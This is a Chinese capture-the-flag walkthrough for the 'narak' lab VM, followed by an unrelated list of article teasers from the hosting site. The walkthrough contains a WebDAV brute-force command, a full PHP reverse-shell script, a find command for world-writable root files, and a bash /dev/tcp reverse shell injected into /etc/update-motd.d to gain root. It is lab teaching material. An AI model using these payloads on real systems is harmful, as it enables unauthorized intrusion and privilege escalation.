narak靶机攻略

narak靶机攻略

扫描

image-20231031205540225

image-20231031205601240

image-20231031205619177

渗透

cewl http://10.4.7.158 > use1.txthydra -L use1.txt -P use1.txt http-get://10.4.7.158/webdav -V -t 50 -f

image-20231031212051020

yamdoot:Swarg
cadaver http://10.4.7.158/webdav

image-20231031212319370

<?php
$ip='10.4.7.158';
$port=12138;
$sock = fsockopen($ip, $port);
$descriptorspec = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open('/bin/sh ' , $descriptorspec,$pipes);
proc_close($process);

写一个php反弹shell

然后使用cadaver上传

image-20231031214241057

上传过后发现该文件

image-20231031214332316

kali监听,然后连接成功

使用python3获取回显

python3 -c 'import pty;pty.spawn("/bin/bash")'

image-20231031214512984

看到一个flag

image-20231031214713054

识别一下里面的字符,发现是md5

image-20231031214842438

解密一下

解不出来一点

在mnt下发现一个密码文件

image-20231031215407053

这一看就是brainfuck

--[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.

解密之后为chitragupt

这目录下还有一个密码文件

image-20231031215557310

解密为yamdoot:Swarg,就是登录web的账号密码

看一下/etc/passwd,有三个登录用户

image-20231031215830214

用刚才解密出来的疑似密码的试试登录

提权

最终发现inferno可以登录

image-20231031220201906

常规提权无果

筛选一下root可执行文件

find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null

image-20231031220644931

在Linux中,/etc/update-motd.d目录下的脚本和程序是以root用户的身份运行的。

/etc/motd是一个文本文件,用于在用户登录系统时显示一条消息。该消息通常用于向用户提供系统的重要信息、公告、警告或其他相关通知

理论上修改 motd 下的任何文件都可,提权时通常修改 /etc/update-motd.d/00-header 文件

echo "bash -c 'bash -i >& /dev/tcp/10.4.7.138/6789 0>&1'" >> /etc/update-motd.d/00-header

image-20231031221723147

将该命令写入,随后重进ssh

登录过后获取root

image-20231031221847736

image-20231031221915791

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/125772.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

识别flink的反压源头

背景 flink中最常见的问题就是反压&#xff0c;这种情况下我们要正确的识别导致反压的真正的源头&#xff0c;本文就简单看下如何正确识别反压的源头 反压的源头 首先我们必须意识到现实中轻微的反压是没有必要去优化的&#xff0c;因为这种情况下是由于偶尔的流量峰值,Task…

JavaScript的高级概述

还记得我们刚刚开始的时候给JavaScript的定义吗&#xff1f; JavaScript是一种高级的&#xff0c;面向对象的&#xff0c;多范式变成语言&#xff01; 这种定义JavaScript只是冰山一角&#xff01; JavaScript的高级定义 JavaScript是一种高级的、基于原型的、面向对象、多范…

网络协议--TCP的保活定时器

23.1 引言 许多TCP/IP的初学者会很惊奇地发现可以没有任何数据流通过一个空闲的TCP连接。也就是说&#xff0c;如果TCP连接的双方都没有向对方发送数据&#xff0c;则在两个TCP模块之间不交换任何信息。例如&#xff0c;没有可以在其他网络协议中发现的轮询。这意味着我们可以…

centos英伟达驱动安装

1、预安装操作 1.1. Verify You Have a CUDA-Capable GPU lspci | grep -i nvidia 1.2. Verify You Have a Supported Version of Linux uname -m && cat /etc/*release1.3. Verify the System Has gcc Installed gcc --version1.4. Verify the System…

Node.js的基本概念node -v 和npm -v 这两个命令的作用

Node.js 是一个开源且跨平台的 JavaScript 运行时环境&#xff0c;它可以让你在服务器端运行 JavaScript 代码。Node.js 使用了 Chrome 的 V8 JavaScript 引擎来执行代码&#xff0c;非常高效。 在 Node.js 出现之前&#xff0c;JavaScript 通常只在浏览器中运行&#xff0c;用…

第 369 场 LeetCode 周赛题解

A 找出数组中的 K-or 值 模拟 class Solution { public:int findKOr(vector<int> &nums, int k) {vector<int> cnt(32);for (auto x: nums)for (int i 0; i < 32; i)if (x >> i & 1)cnt[i];int res 0;for (int i 0; i < 32; i)if (cnt[i] &…

uniapp 开发微信小程序 v-bind给子组件传递函数,该函数中的this不是父组件的二是子组件的this

解决办法&#xff1a;子组件通过缓存子组件this然后&#xff0c;用bind改写this 这个方法因为定义了全局变量that 那么该变量就只能用一次&#xff0c;不然会有赋值覆盖的情况。 要么就弃用v-bind传入函数,改为emit传入自定义事件 [uniapp] uview(1.x) 二次封装u-navbar 导致…

ubuntu配置 Conda 更改默认环境路径

我的需求是以后凡是新建一个虚拟环境都需要安装在一个挂载了大容量的分区/data里面 /home里面的是即将爆满但是还能塞点东西的硬盘. 如果您想要永久更改 Conda 的默认环境路径&#xff0c;可以编辑 Conda 的配置文件。首先&#xff0c;找到 Conda 的配置文件通常是 .condarc 文…

C#学习 - 参数、拓展方法

传值参数 在声明时不带修饰符的形参就是值参数 一个值参数对应一个局部变量&#xff0c;它的初始值来自该方法调用所提供的相应实参。值参数是实参的副本&#xff0c;对值参数的操作不会影响变量的值 传值参数 - 值类型 internal class Program {static void Main(string[] …

C++ 使用堆栈解决回文匹配问题

题目&#xff1a;设称正读和反读都相同的字符序列为“回文”&#xff0c;例如&#xff0c;“abba“和“abccba”是“回文”&#xff0c;“abcde”和“ababab”则不是“回文“&#xff0c;试写一个算法&#xff0c;判别读入的一个以为结束符的字符序列是否是“回文”。 主要思想…

如何读懂深度学习python项目,以`Multi-label learning from single positive label`为例

Paper : Multi-label learning from single positive label Code 先读一读README.md 可能有意想不到的收获&#xff1b; 实验环境设置要仔细看哦&#xff01; 读论文 如何读论文&#xff0c;Readpaper经典十问 &#xff08;可能在我博客里有写&#xff09; How to read a …

@JsonFormat 注解的使用

SpringBoot 中的 JsonFormat 注解 1. 引言2. 简介3. 使用①引入依赖②添加注解 1. 引言 在前后端交互过程当中&#xff0c;往往需要后端返回前端日期类型数据&#xff0c;在将数据返回给前端的时候&#xff0c;可能会需要对日期类型进行格式化&#xff1b; 为更便捷的返回需要…

html获取网络数据,列表展示 一

html获取网络数据&#xff0c;列表展示 js遍历json数组中的json对象 image.png || - 判断数据是否为空&#xff0c;为空就显示 - <!DOCTYPE html> <html><head><meta charset"utf-8"><title>网页列表</title></head><b…

WordPress恢复时候遇到的几个问题

1&#xff0c;一键安装 LAMP 最好是选择 CentOS 这种成熟的系统&#xff0c;最开始用 Alibaba Linux 报了好几个错&#xff0c;懒得折腾&#xff0c;最后重置镜像了。 https://lnmp.org/ wget https://soft.lnmp.com/lnmp/lnmp2.0.tar.gz -O lnmp2.0.tar.gz && tar z…

省钱兄短剧短视频视频滑动播放模块源码支持微信小程序h5安卓IOS

# 开源说明 开源省钱兄短剧系统的播放视频模块&#xff08;写了测试弄了好久才弄出来、最核心的模块、已经实战了&#xff09;&#xff0c;使用uniapp技术&#xff0c;提供学习使用&#xff0c;支持IOSAndroidH5微信小程序&#xff0c;使用Hbuilder导入即可运行 #注意&#xff…

JavaScript从入门到精通系列第二十六篇:详解JavaScript中的Math对象

大神链接&#xff1a;作者有幸结识技术大神孙哥为好友&#xff0c;获益匪浅。现在把孙哥视频分享给大家。 孙哥连接&#xff1a;孙哥个人主页 作者简介&#xff1a;一个颜值99分&#xff0c;只比孙哥差一点的程序员 本专栏简介&#xff1a;话不多说&#xff0c;让我们一起干翻J…

ES的三种分页的选择

一、ES的三种分页的选择 es实现分页查询&#xff0c;在ES中有三种方式可以实现分页&#xff1a;fromsize、scroll、search_after 1、fromsize 分页 原理&#xff1a; 假设取的页数较大时(深分页)&#xff0c;如请求第20页&#xff0c;Elasticsearch不得不取出所有分片上的第…

无人机真机搭建问题记录文档(待续)

搭建问题 问题1 高飞课程中的飞控停产&#xff0c;更换飞控&#xff08;pixhawx 6c&#xff09;出现如下问题 1、飞控太大造成安装机载电脑的碳板上的孔被挡住。 2、课程提供的飞控固件&#xff0c;与更换的飞控不匹配 解决办法 1、现在的无人机碳板上只安装三个螺纹孔&…

pytorch 笔记:index_select

1 基本使用方法 index_select 是 PyTorch 中的一个非常有用的函数&#xff0c;允许从给定的维度中选择指定索引的张量值 torch.index_select(input, dim, index, outNone) -> Tensorinput从中选择数据的源张量dim从中选择数据的维度index 一个 1D 张量&#xff0c;包含你想…

GPS学习(一):在ROS2中将GPS经纬度数据转换为机器人ENU坐标系,在RVIZ中显示坐标轨迹

文章目录 一、GPS模块介绍二、坐标转换转换原理参数解释&#xff1a; 增加回调函数效果演示 本文记录在Ubuntu22.04-Humbel中使用NMEA协议GPS模块的过程&#xff0c;使用国产ROS开发板鲁班猫(LubanCat )进行调试。 一、GPS模块介绍 在淘宝找了款性价比较高的轮趣科技GPS北斗双…